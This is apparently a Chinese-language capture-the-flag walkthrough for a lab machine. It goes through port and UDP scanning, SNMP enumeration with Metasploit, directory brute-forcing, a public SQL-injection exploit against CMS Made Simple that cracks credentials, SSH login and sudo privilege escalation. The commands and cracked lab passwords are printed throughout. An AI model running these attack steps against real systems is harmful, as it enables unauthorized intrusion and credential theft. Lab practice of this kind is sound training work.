环境准备
靶机链接:百度网盘 请输入提取码
提取码:0gp0
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.探测目标靶机开放端口和服务情况
2.查看网页
3.用gobuster扫描网站目录,没有利用信息
4.用nmap查询网站是否开启udp
nmap 192.168.1.102 -sU
漏洞利用
1.开启msf工具,执行以下命令:
search snmp use auxiliary/scanner/snmp/snmp_enum set rhost 192.168.1.102 run
成功得到一部分root 分密码!
Way to Root:1 (0e462097431)
2.用cewl对网站进行字典收集
cewl http://192.168.1.102 -w dict.txt
3.收集成功后用gobuster进行目录扫描,成功爆破出一个kashyapa目录
gobuster dir -u http://192.168.1.102 \ -w ~/dict.txt
4.继续使用工具爆破kashyapa
gobuster dir -u http://192.168.1.102/Kashyapa \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
5.登录网址后,发现是一个cms并且有版本号。
6.查询后,有一个.py文件存在sql注入
searchsploit cms made simple
7.用cp命令把.py文件复制到当前目录,查看下!
8.根据文件提示,拼接命令
发现报错,应该用python2
9.输入正确后,提示少模块,百度下面的网址,下载解压即可。
Python termcolor项目安装包(第三方库)下载详情页面 - PyPI - Python中文网
gzip -d termcolor-1.1.0.tar.gz tar -xvf termcolor-1.1.0.tar cd termcolor-1.1.0 python2 setup.py install
10.一切准备就绪后,回车 等好久........用户名密码就出来了。
python2 46635.py -u http://192.168.1.102/Kashyapa/ --crack -w /usr/share/wordlists/rockyou.txt
atri anasuya
11.登录进去后,发现第二个分密码!!!
第二个分密码 906509019
权限提升
1.用爆破出的用户名密码,登录ssh
atri anasuya
2.在opt目录下有第三个分密码 562988736854
3.把所以密码拼接到一块,用MD5网站解密即可!!!
0e462097431906509019562988736854
4.本来想着这是root密码240610708 ,其实不然是vedas的密码
5.sudo -l 后发现能执行任意命令。
6.提权成功后,进入root目录,成功拿下!!!